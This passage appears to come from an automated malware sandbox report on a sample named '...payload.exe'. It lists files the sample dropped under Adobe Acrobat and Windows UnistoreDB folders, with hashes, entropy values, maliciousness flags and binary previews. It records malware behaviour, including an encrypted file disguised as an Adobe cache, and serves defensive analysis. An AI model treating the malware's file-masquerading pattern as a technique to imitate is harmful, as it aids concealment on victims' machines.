                                                                                                                                                                      Preview:%!Ado.M......._b..+........i....8.gg@...{.5O.NBm.]e..ai$.$.P.....6.b~.lp.../.Y..~{2d"..=.f..f...7._........_.L.....R....J....W3...,.....7.C.;.s.E..j.P3...Z..._.n7.....!1...Q.{:c.. ...{.6.;..u{..........H6W@...Y>..'..TA...b..Rl|........"..g`...i\Y<.e.-.EE7......Kw..I.....n?g.JvJ_...(p..T.#`...B.d......z.D.>2.W..C.U._a.R.....t.........2.~...B.{W..Y....Z...$..~.D}.|..on..>....|..Z..a...[.,t.q..+....@vAdW0...P...*..AF.:@. @.Q6.....j....^*.d...@$.r_.~..[!.m([.yy..E..i.......x h..!.H-.(...N..5...- <....*.Q...DU....9..f..].......~...T......D....mq.$..V.M...Z..v.A....|.P"L,.j[.L...Z~....&.........!....9CH....}RV.Z.....?.....D2........]..g...._...s.....g..vf#>.u . O".U.+...B.....D.e3..#.6h.;...M.....[...k..........d.....nI.......jX.....B.....9..U..Q...%......#..W.sgM.....p'....w.....3q.....O@>..A;y.."..............[...tu..r.M.n......lU=j<.N[.amq.4-....Z..M..._J..[.?.d.A.J..Z..}&.Z.3.T..v.J.[-..~..^93.F..L\F.,U..c..vq.g`.Q....4..'.o...UU

                                                                                                                                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt23.lst

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:PostScript document text
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):185433
                                                                                                                                                                      Entropy (8bit):7.877376962412137
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3072:viIRD54nWr+Chpu33YETwWyFaYnnDOyCMR9LeA2n5KcgaKqJCXE07ZmandGCyN2o:v3Tr+O8rTM9nZRVN25KUeXE07ZmandG1
                                                                                                                                                                      MD5:75DF56EDFB1B467E4649FB41D4E5E63F
                                                                                                                                                                      SHA1:720D48C60965A15EF1A6F6C7AF08AAB191E897E6
                                                                                                                                                                      SHA-256:2B1EB3376A9CE94B36EEC7E1D9450C9CB5AC7AC11BAFC3F32484D03216FCE013
                                                                                                                                                                      SHA-512:9E0A8235BAF2DD09B98B02D867104E110852BD8C7690BF4097A236AB5202B052D52A46A8820F82AA3ABEF6BCF7503CDB2665B890607546B087F39971ACF82F7F
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:%!Ado>j.RMp.....[0...=.....b.kn...i.g].y.~..{u..b.7...t.[...`T.Y`S...Jm.....X.....c..\......,GW..l..~..r....p.[Cj:...t.m....$.....:4.6...B..B........gIV.cp<.b.JT..Z.Lkn7...&......s.Q>.'...,.........;k.....]...u....y'..x.)...u....k......%;[-Mk9.G.)..Y......N7.....c0>."...@...**.....<7.=F.....p}l.."...rqC...s..&.:......n.Ok 7..".......t.....B...Y........+....?....;S..uW.J....K.'.v6..x.!...G....<!.........YN"....F.....Yb.".Z4.t...<.......`...'..l.g%...DA...\Q....-..Pi.|...V.........I...{.DW....:b.Q.w..m.....[U`.....V...6?._....RG......4e..RiPQ...~?....SY.E......l%..F..0.kr.xW...8{M$+..^....Z...{"0.D.....AkQ#..._....N......Wk..UL...xu......s...$...=...O.e..O..!.V.j....n...o....!...a.....!.\...+............k.....}..`E.D.+.,>.+....}1...5.R...z..t.."..99.r....l4._k%...6.\.7.!b.4Z....p.......4.....).....f.[t./....*.tZ....O..'L...y...$Q...2n_.]f....{7....B..|.......z......{#.\.....M.;...x.T.Y9G..{a...[I...l!m.[....j......^.g.:......I...H&K.

                                                                                                                                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\IconCacheAcro65536.dat

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):243530
                                                                                                                                                                      Entropy (8bit):6.822569033372759
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3072:S8w1EYKmC1Lhr7ZX/Ww8o2QwyKJ1tPUOcQIwlyzlNwaE2em8ZdOolNlnK:S85m8Lp7Mw/wJbtPM6rFC8ZVnK
                                                                                                                                                                      MD5:D0E9AF88C247E2DEB7BE3D68DC1724D5
                                                                                                                                                                      SHA1:007F510D7EABA2CA143AEB41F50689566F7A81E6
                                                                                                                                                                      SHA-256:E4DA7A7BFCF10047D645F9090B01E69827AE8D1B0DC75099BB59723824307342
                                                                                                                                                                      SHA-512:4E2E1E03A800D311EA5B073DF38CAF39EF990F8F8BB06859B3907C7FE82D1C67E701A63EF6434FE2B499BBB90EC6B9F66672CA6EF690398370AD46F611C19830
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:Adobe]..8,q..%.Z).':..L.. ....?._>./.Mw.F.$.?....r.?.q.5..6......:..z..n.....aa.S.x...Q......:M[a~Vi;R..:tr...1...z....Ka..Yr.n2.4....Bv&.?..uJ8c.,.....h.....o5..(-fY..e..5.......R."..x........b..b1...F.b.?..?._.3."G.{J3.=...;+p....Z..I.+....+v...h(m]v>..A.w..e..L....S.......!./d....._.F>.......{..R..`0H.k...,.9U.[....<.I..V..P.].....Y.C....X..E.......Q,.N..{..............1...l.........A....1.:..NT..Y.....%.C.K........]..........W.....e-.....P0e...tN^}V.W...S...U........:...@..#Q..8.@f....9..NS......yc...V...6q.....e......W5...|..>..i.._gJk(J#..4...E...b.%.C..r...#...J<z.*.K...............4vjL.....C.....$.y.E.P..R.....&_`kL.....A....a'.EVb..K.gB.\...=XD.VM...>.5..2..o..mX.-.rF1...!.....g)...o.Xe,....;c..[...'."@.Z.:.&..X.;...0...%uiW..n..>...z...#d.........w..[&..W....^..y.8.?.n!...=%...M.....D...;...!..w.t...E...X.bG.....a.qP...&...W8.)4...6.R4...%jh...>..}.....Z..Mq..7..eG.zUl9.Y]O..q......B....}.<.......'h.b.@..F...D\..}..a.I.Z..

                                                                                                                                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\SOPHIA.json

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):3152
                                                                                                                                                                      Entropy (8bit):7.944357295685742
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:YMPbEWuVG0jWVDdNialCZ+wfzUIdFrLRk6Ua5/BuF1n5j5YMGhcumldsG1XkFD:dbEWsIdJl0prp75Ju/Y5cugls
                                                                                                                                                                      MD5:3DDFFA6F198FB98218277ACC335214D5
                                                                                                                                                                      SHA1:55E6C2C84FA2ADD39B889BA0F9745A6497A49DC4
                                                                                                                                                                      SHA-256:AAE01FE8052B3894B5DB812CBBEA455EEEBBD55AA880561A65FBC3CC54B61E0B
                                                                                                                                                                      SHA-512:F6508EEA09BBDEF93BFC84233226863354381267763B18B5A0B492C3EB8CC56DDF9571783D9425F30E04E8A0FE0BA54DDF4EADC5CE69BAA7F5DC8A32728BF8F9
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:{"all...y..ys.+.OR......o..>-.%E.Z...........<......m..O.n\....yiU.e...a.C.>Y.6...1;lC.L ..o.7.Y...'.0..$..C......bC...T..*...fGs&."DDC.W...j.d.....I.A.eTugr'.+E...z.....g.{..kk.i..bhs.A. |.<.).}....:.c)m.1007....S.]`.T..pW:Z_;..</(Pc..hwC..c.QJ./...a....N.......hK.'9.).n!.../...D.7v..tq .._...S0.V...|4B...D.|..M..ai.Kv3.Q...+p#..q./U,..2.x.x-.a.!.~O..~.8..."j}$...G.:.....*~x..M....1.$p.+.1..N..Z...h;.:3..q.q..~..M;.T<.....H.|....j.&BB..f.c..${..I.v`..b..1.l.."~.O..|.,(.8)O..0..Lt.)...Y...)..B.qe..z.i.....<..d...SCs/....gL...S..h.w....DA.r`..>.<./g.9..=-!..Vzv.%...q.a4<.e.........m..W....(P0.G.[.f:.K.Y..v..I...LS...Y}...|A.aY3O.~5..u...g..Y.1...\.{.....r].....cP.E...1x!T..j...k.....b_d...^H..*....%ZD.{......'.....({.&.^.}95.,.+J.3uY.d....L@..u......[...q~P.w...u...45.~.>9..W..._"....[.R?...Z0F....... t;..:G,..7]j...We<.r.<...].-.....-..95.e....7..%ZW....Q&q.u.7..q87H-...i..^..6[......gc.r.c.P..`..1\.\.......:.WR.!4.."t.'?..f1.e..x.......Q.#.....C

                                                                                                                                                                      C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache64.bin

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):67060
                                                                                                                                                                      Entropy (8bit):7.9972008239459
                                                                                                                                                                      Encrypted:true
                                                                                                                                                                      SSDEEP:1536:vJSeLuGvk4USpgAtAoUgpYRAD59Hf7hVDgcbQeVDNv+H6YG:MernUSpgWUQYRe9/73jbQCDNGZG
                                                                                                                                                                      MD5:3945C719A804A5B3EE35DF8A2B447D90
                                                                                                                                                                      SHA1:A650D80CE53D7B1E1D9CE12B2293D79D9C8D9A45
                                                                                                                                                                      SHA-256:337339B4B2B702E8069B3D28BAC03D622FF09EA92D844E4A159055F31A4DA2ED
                                                                                                                                                                      SHA-512:903AB9F8476D9AF3C8949BA8B032F5E426262D4544D2DDEEF0A653E42E1B688B1FCBE4DCAB5E70D9F82CC6322D25CB0BB8D2C5E2528797B85F1213F434B0FA86
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Preview:4.397..........\...C...Y.W.\....Mt...G.`O.'..n..r...0..F..Z+B...jMfxI.9..pd...%.]...f..3.n..,......v/..ZHI.3~...QU..i.m..y.~....2..b.[P.....Y....j.k........^.5j.4/]sjy...~.~\.z.i./.`g.E_.gx.7....Ft....y'...1iR......ZQ.Yr....._...)....... .6..B.U.....J.4..?...5n.......WRfyAmM.F......>q[.e.T.r.h......V........T.x.x.7..e.X*.$..r.:#.>.......b..X.I.;g#.6.v...C. 4vV<{..."....:.UX...|...x..@{...H.8?Z.}`.@....H..?.{......J...Dri..--../. ..w..%.|..7...5....-...P..&........E...].@..&...csH.t....*...8....D..]^...GU.L6v...q.i..B..!..F..rh.....%'...%..k$.O........U.....$..{|.\.....{^.'.... .M...jB6u.q...f...*.....(..%..6...0.k_..F....X..g:...J.:/s.......x.5...}.{z.@.....q...-98..G..]I.x;.V.6.`.^..(..SR1..Wa...S{.g>...!u..&d......l.&9GW.p.c......*.S].P6..*.`.H.p...x.N...A.oM..&..[.!...7.....c.........*....4..C.......v>."W...f..../..+..0...;X...S24.c...%..3..5..{.z(...7j...u....t..J..H.H.....~..B....r.QXb.{V...ye..6.^.1i..V..{M..i.vq.... T....@h.B...Z9r...

                                                                                                                                                                      C:\Users\user\AppData\Local\Adobe\Color\ACECache11.lst

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):932
                                                                                                                                                                      Entropy (8bit):7.781382781715273
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:Gd4DGIMN+PEPulEozb+hAupxcQxx32xtu2bD:24DGIePuZb++8cQxQlD
                                                                                                                                                                      MD5:0752A5CC0C676B890BA1FA2303EB8EBC
                                                                                                                                                                      SHA1:9D5EBFBA106677A76A90EFAEAD721DE625818DA0
                                                                                                                                                                      SHA-256:285D48CCEF8E1B4DCE08D10247AABC0FB28E97542AD3ABD8EF5AF421BEA2D28C
                                                                                                                                                                      SHA-512:12A6901B4E92367028DD6EF745116C1365558E4045C1E3AE81E28956F6E62A22F9F5561B2FF04F8726FA36BF7FA7D9943DCA6BB84EFCB21A6E6AE175F1B1D88F
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:CPSA....{.CL,,...t.7...."..|.i.F.<U...o.F...zYV.o3.r.....F..<E%O.!..P=M.!...@1..f x.U..3.r.OO.._o.......3..G%Yn..<....T....+.. ......i..D.....b..".%...p. ...w...W_..... ..).W...1...JH.....k..A...{0.r.(.u.%..|:].=..yhA.x2......D..6.U.c,....}....w ...FB8m./.....=4..4S.>)?Y.O.F.vZ...|.-.%..~Z..$.5d.\U.[...).a...YI.#>......0:..{...F..h((.z..w..Lg2_..lc...Qv8.-d...A.<...l/8..-:z?cW.....A....v..........J.i.40s.8..o...}.n}:....w..._....=/kiWI-.6....Z...]m.'.....-'..v......7.....CRq3w1,B......y.n....q...}..%"4M3JL.1..,.=~..}....j.5.....o.:G`.../.lJ..N.O.T...I.iA.)F..r8)0v#.....RR.7..?.+.8.b.....g.\b......&T...I2T....R....Z..iVqK..1b..$j@z|4.......^...u...t\...r.....w?!Nk....4..w!E...K5.8.H0.u....o......<8%<.p........AvH...1..#.rH(..f.........@|.....9g.....Y20......YzY...K,.$M.b.R.z..K.s]....?...W[.5,..v.m..i.mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Comms\UnistoreDB\USS.jcp

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):8526
                                                                                                                                                                      Entropy (8bit):7.973945456374672
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:192:djtKtKS1jaIsidxveUFhGcscL9YK0tcsT7bPiCYc:djtiLaIHvyc59YK0aWbOc
                                                                                                                                                                      MD5:A195C993872ABA9B09A31074B7D777DE
                                                                                                                                                                      SHA1:20E231D5492D28E6A62394DA48D20D7B132BDDF2
                                                                                                                                                                      SHA-256:A13431D5DB805B2E49FF265AE466E1617251A9D22E281F570839E082999D686D
                                                                                                                                                                      SHA-512:348D9E677719AF59090B6D50355DC629F5DB4F3EFF953F2A8FCE8AE3AC6D3AD6C04E6A97B471495B3BBA609E5C6A14CC2AE21DA30B9CB5E3607C58BD63267BC4
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.M.#..........,.....Tjp7..t......p....<.....+...7~.&.-.L...<...W....yM.q_...U@.5{l..k^...XJ..m.T<.....^U..p.f.n....+..h.U.7...~.9.[y\'.^...s.."+.`u%....Cm.oEb....cta..).?.....O.D5..~X(.q.6VFH.<V.CUdY.f...3...!WS.o....ez...8Z..Q|.20.5...6o.XO.q.+d..2..^.w..;o...e.E.........f.Qk..G.g.`...c..T...:..H.5.?..+w08........D..c$q7.[Z4..GS,3...D(.E+M.*l.9..)....s$.E.`..c'...u.V..1w.)o..L5.....y;..cv......7.:.....".....Oj.&..NB.L....S.b...2...E...W.......L.)=\...i..Pwi..?H..n......$"....z.~)A.{.4..aa.C.C.]Quj.I....3......4P..F.+.S.|R.[......j...C.Z.1...lsUd.J.a.u.u..U..y.9.........XLp,..ss...I+b.d......M....,8nd......g2~..lh.yU.5..;..q..|..&yDB....%...f.b0f...W.q..}..L+4....)CP..Sy.....k.B}.surC!.I......."....\..C.K.T....J.#...).].1...9.........Zd'.Q.F. .O..d..:g.$.c..5.\...0G{.).^...."au..p.. .g.RS.Bm].....s...\.,0.y(...]!...V..m...wA...L......l..N..\N0...,L...`XUc.7....G....~.1.........:jF...+.....j..<.x.}8.n[.r.^z..&..g.]......U.,...l..?I.5.5......h

                                                                                                                                                                      C:\Users\user\AppData\Local\Comms\UnistoreDB\USS.jtx

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):3146062
                                                                                                                                                                      Entropy (8bit):1.7333570996691994
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6144:L+6l6NyFKkxCToPiZU3J5OdZToauvosllo3agO/qqv4RROYdVbtzFnrG5J5qh+AA:SPYKk4miZUZ5AVoauvoMfCdYS2
                                                                                                                                                                      MD5:9827D1EDE346806796A79E6870DA43BF
                                                                                                                                                                      SHA1:8007E98CD1B5A4376DF7661DD8F0C7539E6631FC
                                                                                                                                                                      SHA-256:CF6DF77ABCB8A9B487A106C22E9ABC241D94DF4464293E7CFAE4F4F0D86AFD92
                                                                                                                                                                      SHA-512:A16A69AB60E4441ACD68E08F39ABE107CDF9DD13F22914788FFD072EB044A09712F87330B8AEA4AFA8DB6584C83C150EEC2D2ADA3E808ADBA1B37FAD92CC42D7
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:...?.j..G....>B...{h.,4.c..0.4.....2...`.....?...Y..<Ef....+...^.Af...x`..^....8.E..;.7..+.*...s_..1E..V..%.....8..l....,A.U...0.s..p..9.....M.......5;\...a#..2.....G....QU.NI.dF.V.ID.1.R.U..f|....;a.Z..gc....IC...I.L:.#4J..4v.e.....w{b..f..).t..IOr.T...;..r....h..c.'.......i...r.>.9R.W.;.Q..s{.b.y.f)....:..e`v*!..?e..$.....Z.(iA.I.&A.Vx2....C.T.Ut2..aE .Y..........f.Z[.g...<.z.a(..`...L..P..N..q.G~....@y.jz.......n.*.....C.e.3sf..'.B.89.Q.F1^....c..{.5>.]..$...i..n.....]E..............2..#q..58.R..j..q....W`f.eD.....f...r..V...j....W.l1...x?t..)...c.B.A.[..).......m..B.A:?.A..1.hr.+.4.C.qcBD.4.u....W.......]z.1G.s..~[..E..rW&..5.(TlI...25&...........i.N.:..QP~..d...I...Q.......4H8...4HJ).p.....L..,....+3..w..9z..:.l....P..6.z....<....:/<n.I.D..4.9c.lU.D.18~._._.......6`....<...^..?..?..M.&S.........R.~..7...V...MZ...1.c....X..........H.3...E2...Y._.H......d-<..!..*.WVEs.......3...B.....?.<'..?.Q2.rQm..)....!.m..Sp..K._u."..,...r/+q@.(...-

                                                                                                                                                                      C:\Users\user\AppData\Local\Comms\UnistoreDB\USSres00001.jrs

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):3146062
                                                                                                                                                                      Entropy (8bit):0.6705479184420877
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3072:J2BPkU7J71ptMQpYxQ7Hnv8UfIffnGHOfrFM9a2H0dFq2GMDY/ysmT62bqAVS:J2lkUXDMlQ7zIWufrq9dUzY/CT62bqsS
                                                                                                                                                                      MD5:44427B9357BD2A403F47205E89ABAF12
                                                                                                                                                                      SHA1:0778B5AB3358C1DE203865EC7ADDE82D9FA89B4A
                                                                                                                                                                      SHA-256:6635D2334F745A35D91A35CC2A72F9599BEAEA8DACCC2CCF2CFCADEC9405F44B
                                                                                                                                                                      SHA-512:F524B5630190E582335B344008ED2A0BF986349CDE0E305FC854EA5FAD3A37C6054DFAC2262BFFA361BBC764EAEDAEB343ABD008D69D44E17B9A519140E62B55
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:......3..f.....'.F....*..I.v.........._...RG.Cb7.lT.&.S.Un..."*_........h=D...+........./..nh..(^\...q.t...\.'... @.....f4U..;."..N...z......y..W.CW< s...........w..X#t........#....b8...<..L.a}T..{..O..o.......I.s_......}. ..D....e.~.F.N..*..s.[...-.;jSE"..qp...]....:^Eq.=g.\.t%.....\.#n[_K..u6...........r..,.|.....t\.uJ...{N.....W...7.I..&...5Q.I.*U..m.Sf..^..m.^.q.L...R..Ch.K.U.......@X..6........<.\0:.j..#;d.N....ID...:..B.l|e...vE*}..x...Cv.\..o'%52...\..*Di.6..;......._.5kes .)..`H..T..^..aY.B]S.l..n45.....l]..h........co...O.Nf.~.b..U.+mB..'....N.)P.....td......TZ.b.0..`.X...AU....|jT....^......."42p.d..'.'y.;Dr.V&y.#.M..9/.6...z....D.wn.N.......*.a.B/.M.^...b&..8.$Q...&...u..J...9.GT............y.4.zD.Thsi._........a@o)c3c....[..7..V..0a.k..P...5..X.....U....c...l........o ..pBS;.y.M9....lr;k.er.V....s;..a.OBz._...$X.;.....5...._..V.....'PK..H...[.:..u.t.n..\{.....toE...."./.PQ10.S.D..hO..n.s...4...'B%....wG......q.3..;....L.....

                                                                                                                                                                      C:\Users\user\AppData\Local\Comms\UnistoreDB\USSres00002.jrs

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):3146062
                                                                                                                                                                      Entropy (8bit):0.6705590872486562
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6144:Fi+mQ0anCri1rwAVbcrbZz9RybImRlC33:FiMnJUAKrVz9RyLs
                                                                                                                                                                      MD5:EA7D8B37CF008F055F06925990634F74
                                                                                                                                                                      SHA1:F8696D2E44C8583B809D9B0D1F761E4BD0501E57
                                                                                                                                                                      SHA-256:55F9205BE63B94F63029496D76F5B326EE75968F4EBF456961304783C587DF23
                                                                                                                                                                      SHA-512:977AE60094DEA7D02551AE5A2F3D3B602588EECB24B0E5F56C8147C02B87CBBF497A55E63218DADF9EB7A9E964A07711DB919295D5692930F16047FFEDA7CB80
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:......@.v3. n...].<.>:..67.<.....1#d7x[...p.6*K.0....S.A..1..{.vs..f...n./i.!.2@cu..1.8.q.".!t...%(...A..@.~....[...E...u.yM.J....`s...p.XY.._HF#..........pm.[al>E.!.^.....)...7.).m.......'...2.,.H"......p....Ph....+m-.D.. .W..b .\F....sB.....9.#o..z.......AW..fr.z....g.k-...M......8O..Z...?."}.A`Xj.Z4.P...K.s.8..t..A.,Q..W.....p%...R.t.h\8#_...3..\./.DP..-..@....).E.Q.....]..-.K.....z.0b.X3r.c.m1}.jn.c/.:.TZ.`C.....G.-y2...~...^..R~....q.;......4..q.3$.d. $....t....A.....D.../..R..."KE..HL......:^SG.>;.i..w)..I.h.(.-. ..9....5.......WW*_wc..7.`..q.....s...#+.Vd.5.0.....u..../.y.....&%.r.}.....c..X.. .s.......!.|m....K3,.......D..C.B....:.1.#e.rL.....|..q.4.k#W..X.}..4.O....s.U...e:..J..Pu..sf......Y.n=d...S.w..#{$P......p..]....t.M.....^...K....5....%.....}...%.........P.'....cN ,Lo...Q..L.k1.3...<..[A.a...d.~'[2..[.<. ....LkV...v...{..=V;.I........%Ul.i.......9....p.M...g..N...,..yR.JG...:5WA.[n..ie{..L.(...x..ff...#...`..{.$.

                                                                                                                                                                      C:\Users\user\AppData\Local\Comms\UnistoreDB\USStmp.jtx

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):3146062
                                                                                                                                                                      Entropy (8bit):0.670436303821505
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3072:SLmA2YsnEdVjDnHjMHOHk89GLcsFw6o45MyZJ7bnMKbn7:8sEjnDMwtvLiZJ7bMCn7
                                                                                                                                                                      MD5:8DB1B2EC36BCD7D82D238DD9DE715FFD
                                                                                                                                                                      SHA1:082568D7D3C80DFD0DE1801B1EA9DA4E377F148B
                                                                                                                                                                      SHA-256:78C3466CB4A7640FF763A8466F299BCD4596223E5CC63E9FB4192B12352E74FC
                                                                                                                                                                      SHA-512:A84E38BB50399E0B7E48D7B84B61235DE68252E582273C8C46C914AE8A3F97083321DDA4B76CA6C1A9A6023E2AABC549FB315899D8F026854EA6E07258CD1758
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.....M_mw..C4L.%.Q...N..v....'"9.8...%.......Z..@....r.X..6...m4..T.)f..!P:....,.=.%..c....9.fI.5..2.o..~+..:3...jU..o...9.......s.9[..6..E..qZ)9.A^....|9...EQ..-.mN...r.?......T.w..&.z..K...1..<*.a.....B...U.......b:vj.......CY..Q..._&....0..Z..j").w(..yIY=C......>.z.+A.s.>.T...fsE`."...........A*..GF......Y....bM.TZ^.................&..WS.........F.X,'{.....#..=.".L=L.z.Z....d.>.....!S.%...w}.......t\[...4..\...=.C!=.^F\.T..7..p1..G..K..._....h.......u..@.A..F......c...f-N..c.xE.wc#...o...r{...M.). L{...5].s.pP..4.._..Of........,...y..#....u`.q.T._..i...c.n.?.\kYE=n..:.....=..XR.....!...K.E.+WI...W+n/^.89s.6......L..'AIy...B.?..&..7..q<y........ }..3..L.......v....<.T.[...)=.......#...~.....e..l.'.6..d.K.k!...y.V.j.....+....O..Pf.........".&..bD.-.^Eel..A........)0z.....D.'.. )X.\E..%T2.....G.H..eZ...4..(..:......RH".;....".u..'......n.&..N.....i............U..z.iW4.y...4.i]..^.....c.&....n+......rP./...R...o*...&f+l."

                                                                                                                                                                      C:\Users\user\AppData\Local\Comms\UnistoreDB\store.jfm

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):16718
                                                                                                                                                                      Entropy (8bit):7.98832616024852
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:384:KrVLEXksIP34HIzanSc5BF2pechJ5dLOvyF2wzzHMa+OUaX:KJL7sIPxHp50vUNLjX
                                                                                                                                                                      MD5:87F28A71FC6D7B12B5406D9FBD1F4540
                                                                                                                                                                      SHA1:E15A1AC97FBAB3E14E32BDF1B7ADB2C53A415698
                                                                                                                                                                      SHA-256:512FD43956E9D3A043F222E84CCDA2172D017DCF9D37DC1709B54A5566A5F77F
                                                                                                                                                                      SHA-512:9B631194D5729B8308A52B9F0B48DA1A0FF2E58DC58D425D7ED4F8EF53BE51D98AF7DD04D853E029E2C86515A28D6E62F5A667D858C1F32930DEB54E01E98AD1
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.........7|..H..F.'.T|.....<.IONh..N..gD..:....?...i.../:...XS.:@../.w..e.........=.EFX`..x......OVD.+.........Z$}2...g....=LM....M.X..+`.@.~v.8....x.......p^..jRc.......W..wC.L.[.....=r_.J8.8.SB.....N..$...gx.?.bc.... I..n..i..P.I...B.9....j....[..'...D3g...!.1r.r.bFh}.. t...i.`78.2....?..3. ..0....G.^[....}...NTK..o..K.......b!f..t...g..g..D...3Xm.... .!.gH&.o..~.A...!..E!.j.N....*.....y.l.9..0.&..a7...i'.A.0.?W4..S.B........q}.^V<&.m.....N...#!Y`.j......-.<.~\(...Y.U...+...h....?.\..(.....T.....^W..@..&..9W.[p0b...q....C..-...@.>Oa.>.9...)X..N.t...}.C.....{.....;5mC)...t..n.: ]....QZ....}..o......=Y...!..(&bT..6<..p.....V.<..r...|A[..<.W.?..ya..`.Y..}..P...0d....Do[.gtZ...i.Fr..(.dU...r....Ah......AE.O\..6....v..dw....7..G.`~...[0L....49P.,...R...U.{.`u.S.....O^..q.....0.!o....S.. c~E...h.W....Rl.5e..P..Y...P.....byPv...o'LD.......|....6..f:'.....q.Q..c^M.a....$h.....C...(...m.0/o.D..q(*...B..w..!.T..L.. z..5...0....|....D...#.....

                                                                                                                                                                      C:\Users\user\AppData\Local\Comms\UnistoreDB\store.vol

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):5767502
                                                                                                                                                                      Entropy (8bit):0.7569884105114273
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6144:qtGmzIAPF4x61sSORj36M6AoCVrzgSa+d+gOrOuWxWk3m+cun4CfYjUfSUXivOYl:yOhx61I2GoQtR3b0V
                                                                                                                                                                      MD5:EF90678A3257B5AE33BAC00E5F7FAF74
                                                                                                                                                                      SHA1:937E7E1789E365FE2AF81732C05B285D1A20578F
                                                                                                                                                                      SHA-256:CC9583EA240E541A9FB007088002A9EAEDE7D08BD9C0BA7057BC9DD85646953D
                                                                                                                                                                      SHA-512:49430644EA00C58E05661193BC4C68BC253067CFD961821A0D636503BF06CDF9335A14631ED7624865AA0F3F3C0364B061475AA74B31F99189FBCE761113FC36
                                                                                                                                                                      Malicious:false
